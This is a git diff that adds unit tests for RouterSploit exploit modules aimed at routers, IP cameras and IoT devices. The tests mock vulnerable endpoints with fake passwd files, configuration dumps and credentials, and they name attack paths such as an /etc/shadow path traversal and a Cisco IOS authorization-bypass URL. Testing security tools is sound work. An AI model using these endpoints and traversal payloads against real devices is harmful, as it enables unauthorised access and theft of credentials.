resp.headers["Server"] = "GoAhead-Webs" + resp.headers["Content-type"] = "application/octet-stream" + resp.headers["Content-Transfer-Encoding"] = "binary" + resp.headers["Content-Disposition"] = "attachment; filename=\"Config.CFG\"" + return resp, 200 + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/frame/GetConfig", methods=["GET", "POST"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() is True + assert exploit.run() is None diff --git a/tests/exploits/cameras/honeywell/__init__.py b/tests/exploits/cameras/honeywell/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/cameras/honeywell/test_hicc_1100pt_password_disclosure.py b/tests/exploits/cameras/honeywell/test_hicc_1100pt_password_disclosure.py new file mode 100644 index 000000000..6f5e3cea8 --- /dev/null +++ b/tests/exploits/cameras/honeywell/test_hicc_1100pt_password_disclosure.py @@ -0,0 +1,21 @@ +from routersploit.modules.exploits.cameras.honeywell.hicc_1100pt_password_disclosure import Exploit + + +def test_success(target): + """ Test scenario: successful check """ + + route_mock = target.get_route_mock("/cgi-bin/readfile.cgi", methods=["GET"]) + route_mock.return_value = ( + 'var Adm_ID="admin";' + 'var Adm_Pass1="admin";' + 'var Adm_Pass2="admin";' + 'var Language="en";' + 'var Logoff_Time="0";' + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/cameras/multi/__init__.py b/tests/exploits/cameras/multi/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/cameras/multi/test_jvc_vanderbilt_honeywell_path_traversal.py b/tests/exploits/cameras/multi/test_jvc_vanderbilt_honeywell_path_traversal.py new file mode 100644 index 000000000..6f42df522 --- /dev/null +++ b/tests/exploits/cameras/multi/test_jvc_vanderbilt_honeywell_path_traversal.py @@ -0,0 +1,59 @@ +from routersploit.modules.exploits.cameras.multi.jvc_vanderbilt_honeywell_path_traversal import Exploit + + +def test_check_v1_success(target): + """ Test scenario - successful check via method 1 """ + + route_mock = target.get_route_mock("/cgi-bin/check.cgi", methods=["GET"]) + route_mock.return_value = ( + "root:x:0:0:root:/root:/bin/bash" + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + "sync:x:4:65534:sync:/bin:/bin/sync" + "games:x:5:60:games:/usr/games:/usr/sbin/nologin" + "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" + "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" + "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" + "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" + "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" + "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" + "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None + + +def test_check_v2_success(target): + """ Test scenario - successful check via method 2 """ + + route_mock = target.get_route_mock("/cgi-bin/chklogin.cgi", methods=["GET"]) + route_mock.return_value = ( + "root:x:0:0:root:/root:/bin/bash" + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + "sync:x:4:65534:sync:/bin:/bin/sync" + "games:x:5:60:games:/usr/games:/usr/sbin/nologin" + "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" + "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" + "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" + "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" + "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" + "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" + "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/cameras/multi/test_netwave_ip_camera_information_disclosure.py b/tests/exploits/cameras/multi/test_netwave_ip_camera_information_disclosure.py new file mode 100644 index 000000000..056d3e0d5 --- /dev/null +++ b/tests/exploits/cameras/multi/test_netwave_ip_camera_information_disclosure.py @@ -0,0 +1,34 @@ +from routersploit.modules.exploits.cameras.multi.netwave_ip_camera_information_disclosure import Exploit + + +def test_check_v2_success(target): + """ Test scenario - successful check via method 2 """ + + route_mock = target.get_route_mock("/get_status.cgi", methods=["GET"]) + route_mock.return_value = ( + "var id='E8ABFA1BC72F';" + "var sys_ver='17.37.2.49';" + "var app_ver='20.8.1.166';" + "var alias='Camera';" + "var now=1509798733;" + "var tz=0;" + "var alarm_status=0;" + "var ddns_status=40;" + "var ddns_host='/vipddns/upgengxin.asp';" + "var oray_type=0;" + "var upnp_status=1;" + "var p2p_status=0;" + "var p2p_local_port=26296;" + "var msn_status=0;" + "var wifi_status=1;" + "var temperature=0.0;" + "var humidity=0;" + "var tridro_error='';" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/cameras/siemens/__init__.py b/tests/exploits/cameras/siemens/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/cameras/siemens/test_cvms2025_credentials_disclosure.py b/tests/exploits/cameras/siemens/test_cvms2025_credentials_disclosure.py new file mode 100644 index 000000000..5ab92a45d --- /dev/null +++ b/tests/exploits/cameras/siemens/test_cvms2025_credentials_disclosure.py @@ -0,0 +1,17 @@ +from routersploit.modules.exploits.cameras.siemens.cvms2025_credentials_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/cgi-bin/readfile.cgi", methods=["GET"]) + route_mock.return_value = ( + 'Adm_ID="admin"' + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/misc/__init__.py b/tests/exploits/misc/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/misc/asus/test_b1m_projector_rce.py b/tests/exploits/misc/asus/test_b1m_projector_rce.py new file mode 100644 index 000000000..5f863d8bf --- /dev/null +++ b/tests/exploits/misc/asus/test_b1m_projector_rce.py @@ -0,0 +1,32 @@ +from unittest import mock +from routersploit.modules.exploits.misc.asus.b1m_projector_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.misc.asus.b1m_projector_rce.shell") +def test_exploit_success(mocked_shell, target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/cgi-bin/apply.cgi", methods=["GET"]) + route_mock.return_value = ( + "root:x:0:0:root:/root:/bin/bash" + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + "sync:x:4:65534:sync:/bin:/bin/sync" + "games:x:5:60:games:/usr/games:/usr/sbin/nologin" + "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" + "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" + "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" + "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" + "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" + "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" + "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/misc/miele/__init__.py b/tests/exploits/misc/miele/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/misc/miele/test_pg8528_path_traversal.py b/tests/exploits/misc/miele/test_pg8528_path_traversal.py new file mode 100644 index 000000000..43e0b0261 --- /dev/null +++ b/tests/exploits/misc/miele/test_pg8528_path_traversal.py @@ -0,0 +1,30 @@ +from routersploit.modules.exploits.misc.miele.pg8528_path_traversal import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/../../../../../../../../../../../../etc/shadow", methods=["GET"]) + route_mock.return_value = ( + "root:x:0:0:root:/root:/bin/bash" + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + "sync:x:4:65534:sync:/bin:/bin/sync" + "games:x:5:60:games:/usr/games:/usr/sbin/nologin" + "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" + "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" + "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" + "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" + "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" + "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" + "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/misc/wepresent/__init__.py b/tests/exploits/misc/wepresent/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/misc/wepresent/test_wipg1000_rce.py b/tests/exploits/misc/wepresent/test_wipg1000_rce.py new file mode 100644 index 000000000..e060615c2 --- /dev/null +++ b/tests/exploits/misc/wepresent/test_wipg1000_rce.py @@ -0,0 +1,21 @@ +from unittest import mock +from routersploit.modules.exploits.misc.wepresent.wipg1000_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.misc.wepresent.wipg1000_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + cgi_mock = target.get_route_mock("/cgi-bin/rdfs.cgi", methods=["GET"]) + cgi_mock.return_value = ( + 'test' + 'Follow administrator instructions to enter the complete path' + 'test' + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/__init__.py b/tests/exploits/routers/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/asmax/__init__.py b/tests/exploits/routers/asmax/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/asmax/test_ar_1004g_password_disclosure.py b/tests/exploits/routers/asmax/test_ar_1004g_password_disclosure.py new file mode 100644 index 000000000..f4a551572 --- /dev/null +++ b/tests/exploits/routers/asmax/test_ar_1004g_password_disclosure.py @@ -0,0 +1,21 @@ +from routersploit.modules.exploits.routers.asmax.ar_1004g_password_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/password.cgi", methods=["GET"]) + route_mock.return_value = ( + "test" + "pwdAdmin = 'admin_password';" + "pwdSupport = 'support_password';" + "pwdUser = 'user_password';" + "test" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/asmax/test_ar_804_gu_rce.py b/tests/exploits/routers/asmax/test_ar_804_gu_rce.py new file mode 100644 index 000000000..c80b52cf6 --- /dev/null +++ b/tests/exploits/routers/asmax/test_ar_804_gu_rce.py @@ -0,0 +1,32 @@ +from unittest import mock +from routersploit.modules.exploits.routers.asmax.ar_804_gu_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.routers.asmax.ar_804_gu_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi-bin/script", methods=["GET"]) + route_mock.return_value = ( + "root:x:0:0:root:/root:/bin/bash" + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + "sync:x:4:65534:sync:/bin:/bin/sync" + "games:x:5:60:games:/usr/games:/usr/sbin/nologin" + "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" + "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" + "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" + "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" + "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" + "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" + "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/asus/__init__.py b/tests/exploits/routers/asus/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/asus/test_rt_n16_password_disclosure.py b/tests/exploits/routers/asus/test_rt_n16_password_disclosure.py new file mode 100644 index 000000000..e827dbac6 --- /dev/null +++ b/tests/exploits/routers/asus/test_rt_n16_password_disclosure.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.asus.rt_n16_password_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/error_page.htm", methods=["GET"]) + route_mock.return_value = ( + "test" + "if('1' == '0' || 'admin1234' == 'admin')" + "test" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/belkin/__init__.py b/tests/exploits/routers/belkin/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/belkin/test_auth_bypass.py b/tests/exploits/routers/belkin/test_auth_bypass.py new file mode 100644 index 000000000..193201e8c --- /dev/null +++ b/tests/exploits/routers/belkin/test_auth_bypass.py @@ -0,0 +1,18 @@ +from routersploit.modules.exploits.routers.belkin.auth_bypass import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/login.stm", methods=["GET"]) + route_mock.return_value = ( + "test" + "password= \"admin1234\"" + "test" + ) + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/belkin/test_g_n150_password_disclosure.py b/tests/exploits/routers/belkin/test_g_n150_password_disclosure.py new file mode 100644 index 000000000..f0825b7ef --- /dev/null +++ b/tests/exploits/routers/belkin/test_g_n150_password_disclosure.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.belkin.g_n150_password_disclosure import Exploit + + +def test_exploit_success(target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/login.stm", methods=["GET"]) + route_mock.return_value = ( + "test" + "password= \"admin1234\"" + "test" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/belkin/test_g_plus_info_disclosure.py b/tests/exploits/routers/belkin/test_g_plus_info_disclosure.py new file mode 100644 index 000000000..9e50b5ed0 --- /dev/null +++ b/tests/exploits/routers/belkin/test_g_plus_info_disclosure.py @@ -0,0 +1,27 @@ +from routersploit.modules.exploits.routers.belkin.g_plus_info_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/SaveCfgFile.cgi", methods=["GET"]) + route_mock.return_value = ( + 'test' + 'pppoe_username' + 'pppoe_password' + 'wl0_pskkey' + 'wl0_key1' + 'mradius_password' + 'mradius_secret' + 'httpd_password' + 'http_passwd' + 'pppoe_passwd' + 'test' + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/belkin/test_n150_path_traversal.py b/tests/exploits/routers/belkin/test_n150_path_traversal.py new file mode 100644 index 000000000..0358a738b --- /dev/null +++ b/tests/exploits/routers/belkin/test_n150_path_traversal.py @@ -0,0 +1,30 @@ +from routersploit.modules.exploits.routers.belkin.n150_path_traversal import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/cgi-bin/webproc", methods=["GET"]) + route_mock.return_value = ( + "root:x:0:0:root:/root:/bin/bash" + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + "sync:x:4:65534:sync:/bin:/bin/sync" + "games:x:5:60:games:/usr/games:/usr/sbin/nologin" + "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" + "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" + "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" + "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" + "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" + "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" + "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin" + "backup:x:34:34:backup:/var/backups:/usr/sbin/nologin" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/belkin/test_n750_rce.py b/tests/exploits/routers/belkin/test_n750_rce.py new file mode 100644 index 000000000..b2cc157f8 --- /dev/null +++ b/tests/exploits/routers/belkin/test_n750_rce.py @@ -0,0 +1,25 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.belkin.n750_rce import Exploit + + +def apply_response(*args, **kwargs): + jump = request.form['jump'] + return ( + "TEST" + jump + "TEST" + ), 200 + + +@mock.patch("routersploit.modules.exploits.routers.belkin.n750_rce.shell") +def test_exploit_success(mocked_shell, target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/login.cgi.php", methods=["POST"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/belkin/test_n750_twonky_rce.py b/tests/exploits/routers/belkin/test_n750_twonky_rce.py new file mode 100644 index 000000000..9c56ed02b --- /dev/null +++ b/tests/exploits/routers/belkin/test_n750_twonky_rce.py @@ -0,0 +1,83 @@ +from unittest import mock +from flask import request +#from routersploit.modules.exploits.routers.belkin.n750_twonky_rce import Exploit + + +def apply_response(*args, **kwargs): + return ( + """ + TEST + root:x:0:0:root:/root:/bin/bash + daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin + bin:x:2:2:bin:/bin:/usr/sbin/nologin + sys:x:3:3:sys:/dev:/usr/sbin/nologin + sync:x:4:65534:sync:/bin:/bin/sync + games:x:5:60:games:/usr/games:/usr/sbin/nologin + man:x:6:12:man:/var/cache/man:/usr/sbin/nologin + lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin + mail:x:8:8:mail:/var/mail:/usr/sbin/nologin + news:x:9:9:news:/var/spool/news:/usr/sbin/nologin + uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin + proxy:x:13:13:proxy:/bin:/usr/sbin/nologin + www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin + backup:x:34:34:backup:/var/backups:/usr/sbin/nologin + list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin + irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin + gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin + nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin + systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin + systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin + systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin + systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/usr/sbin/nologin + _apt:x:104:65534::/nonexistent:/usr/sbin/nologin + mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false + epmd:x:106:110::/var/run/epmd:/usr/sbin/nologin + Debian-exim:x:107:111::/var/spool/exim4:/usr/sbin/nologin + uuidd:x:108:113::/run/uuidd:/usr/sbin/nologin + rwhod:x:109:65534::/var/spool/rwho:/usr/sbin/nologin + redsocks:x:110:114::/var/run/redsocks:/usr/sbin/nologin + usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin + miredo:x:112:65534::/var/run/miredo:/usr/sbin/nologin + Debian-snmp:x:113:115::/var/lib/snmp:/bin/false + ntp:x:114:116::/nonexistent:/usr/sbin/nologin + stunnel4:x:115:118::/var/run/stunnel4:/usr/sbin/nologin + rtkit:x:116:119:RealtimeKit,,,:/proc:/usr/sbin/nologin + postgres:x:117:120:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash + dnsmasq:x:118:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin + messagebus:x:119:121::/var/run/dbus:/usr/sbin/nologin + iodine:x:120:65534::/var/run/iodine:/usr/sbin/nologin + arpwatch:x:121:123:ARP Watcher,,,:/var/lib/arpwatch:/bin/sh + sslh:x:122:127::/nonexistent:/usr/sbin/nologin + gluster:x:123:129::/var/lib/glusterd:/usr/sbin/nologin + couchdb:x:124:130:CouchDB Administrator,,,:/var/lib/couchdb:/bin/bash + avahi:x:125:133:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin + sshd:x:126:65534::/run/sshd:/usr/sbin/nologin + colord:x:127:134:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin + saned:x:128:136::/var/lib/saned:/usr/sbin/nologin + speech-dispatcher:x:129:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false + pulse:x:130:137:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin + Debian-gdm:x:131:139:Gnome Display Manager:/var/lib/gdm3:/bin/false + king-phisher:x:132:140::/var/lib/king-phisher:/usr/sbin/nologin + dradis:x:133:141::/var/lib/dradis:/usr/sbin/nologin + beef-xss:x:134:142::/var/lib/beef-xss:/usr/sbin/nologin + TEST + """ + ), 200 + + +#@mock.patch("routersploit.modules.exploits.routers.belkin.n750_twonky_rce.shell") +#def test_check_success(mocked_shell, target) +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/twonky_cmd.cgi", methods=["GET"]) + route_mock.side_effect = apply_response + + return + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/belkin/test_play_mac_prce.py b/tests/exploits/routers/belkin/test_play_mac_prce.py new file mode 100644 index 000000000..aad3dc8ef --- /dev/null +++ b/tests/exploits/routers/belkin/test_play_mac_prce.py @@ -0,0 +1,21 @@ +from unittest import mock +from routersploit.modules.exploits.routers.belkin.play_max_prce import Exploit + + +@mock.patch("routersploit.modules.exploits.routers.belkin.play_max_prce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/login.stm", methods=["GET"]) + route_mock.return_value = ( + "test" + "password= \"admin1234\"" + "test" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/bhu/__init__.py b/tests/exploits/routers/bhu/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/bhu/test_bhu_urouter_rce.py b/tests/exploits/routers/bhu/test_bhu_urouter_rce.py new file mode 100644 index 000000000..8cf238eee --- /dev/null +++ b/tests/exploits/routers/bhu/test_bhu_urouter_rce.py @@ -0,0 +1,28 @@ +from unittest import mock +from routersploit.modules.exploits.routers.bhu.bhu_urouter_rce import Exploit + + +@mock.patch("routersploit.modules.exploits.routers.bhu.bhu_urouter_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock1 = target.get_route_mock("/cgi-bin/cgiSrv.cgi", methods=["POST"]) + route_mock1.return_value = ( + "test" + "status=\"doing\"" + "test" + ) + + route_mock2 = target.get_route_mock("/routersploit.check", methods=["GET"]) + route_mock2.return_value = ( + "test" + "root" + "test" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/billion/__init__.py b/tests/exploits/routers/billion/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/billion/test_billion_7700n4_password_disclosure.py b/tests/exploits/routers/billion/test_billion_7700n4_password_disclosure.py new file mode 100644 index 000000000..e8431d88e --- /dev/null +++ b/tests/exploits/routers/billion/test_billion_7700n4_password_disclosure.py @@ -0,0 +1,21 @@ +#from routersploit.modules.exploits.routers.billion.7700nr4_password_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + return + + route_mock = target.get_route_mock("/backupsettings.conf", methods=["GET"]) + route_mock.return_value = ( + "test" + "Admin1234Password" + "test" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/cisco/__init__.py b/tests/exploits/routers/cisco/__init__.py new file mode 100644 index 000000000..e69de29bb diff --git a/tests/exploits/routers/cisco/test_dpc2420_info_disclosure.py b/tests/exploits/routers/cisco/test_dpc2420_info_disclosure.py new file mode 100644 index 000000000..2472ae56c --- /dev/null +++ b/tests/exploits/routers/cisco/test_dpc2420_info_disclosure.py @@ -0,0 +1,18 @@ +from routersploit.modules.exploits.routers.cisco.dpc2420_info_disclosure import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/filename.gwc", methods=["GET"]) + route_mock.return_value = ( + "User Password" + "Admin1234" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/cisco/test_firepower_management60_path_traversal.py b/tests/exploits/routers/cisco/test_firepower_management60_path_traversal.py new file mode 100644 index 000000000..1da1a742e --- /dev/null +++ b/tests/exploits/routers/cisco/test_firepower_management60_path_traversal.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.cisco.firepower_management60_path_traversal import Exploit + + +def test_check_success(target): + """ Test scenario - successful exploitation """ + + route_mock = target.get_route_mock("/login.cgi", methods=["GET"]) + route_mock.return_value = ( + "test" + "6.0.1" + "test" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/cisco/test_ios_http_authorization_bypass.py b/tests/exploits/routers/cisco/test_ios_http_authorization_bypass.py new file mode 100644 index 000000000..8bcc1e3df --- /dev/null +++ b/tests/exploits/routers/cisco/test_ios_http_authorization_bypass.py @@ -0,0 +1,19 @@ +from routersploit.modules.exploits.routers.cisco.ios_http_authorization_bypass import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/level/44/exec/-/show startup-config", methods=["GET"]) + route_mock.return_value = ( + "test" + "Command was: show startup-config" + "test" + ) + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/cisco/test_ucs_manager_rce.py b/tests/exploits/routers/cisco/test_ucs_manager_rce.py new file mode 100644 index 000000000..95a8801e4 --- /dev/null +++ b/tests/exploits/routers/cisco/test_ucs_manager_rce.py @@ -0,0 +1,24 @@ +from unittest import mock +from flask import request +from routersploit.modules.exploits.routers.cisco.ucs_manager_rce import Exploit + + +def apply_response(*args, **kwargs): + return ( + "TEST" + request.headers['User-Agent'] + "TEST" + ), 200 + + +@mock.patch("routersploit.modules.exploits.routers.cisco.ucs_manager_rce.shell") +def test_check_success(mocked_shell, target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/ucsm/isSamInstalled.cgi", methods=["GET"]) + route_mock.side_effect = apply_response + + exploit = Exploit() + exploit.target = target.host + exploit.port = target.port + + assert exploit.check() + assert exploit.run() is None diff --git a/tests/exploits/routers/cisco/test_unified_multi_path_traversal.py b/tests/exploits/routers/cisco/test_unified_multi_path_traversal.py new file mode 100644 index 000000000..c2709abb5 --- /dev/null +++ b/tests/exploits/routers/cisco/test_unified_multi_path_traversal.py @@ -0,0 +1,30 @@ +from routersploit.modules.exploits.routers.cisco.unified_multi_path_traversal import Exploit + + +def test_check_success(target): + """ Test scenario - successful check """ + + route_mock = target.get_route_mock("/ccmivr/IVRGetAudioFile.do", methods=["GET"]) + route_mock.return_value = ( + "admin:x:0:0:root:/root:/bin/bash" + "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin" + "bin:x:2:2:bin:/bin:/usr/sbin/nologin" + "sys:x:3:3:sys:/dev:/usr/sbin/nologin" + "sync:x:4:65534:sync:/bin:/bin/sync" + "games:x:5:60:games:/usr/games:/usr/sbin/nologin" + "man:x:6:12:man:/var/cache/man:/usr/sbin/nologin" + "lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin" + "mail:x:8:8:mail:/var/mail:/usr/sbin/nologin" + "news:x:9:9:news:/var/spool/news:/usr/sbin/nologin" + "uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin" + "proxy:x:13:13:proxy:/bin:/usr/sbin/nologin" + 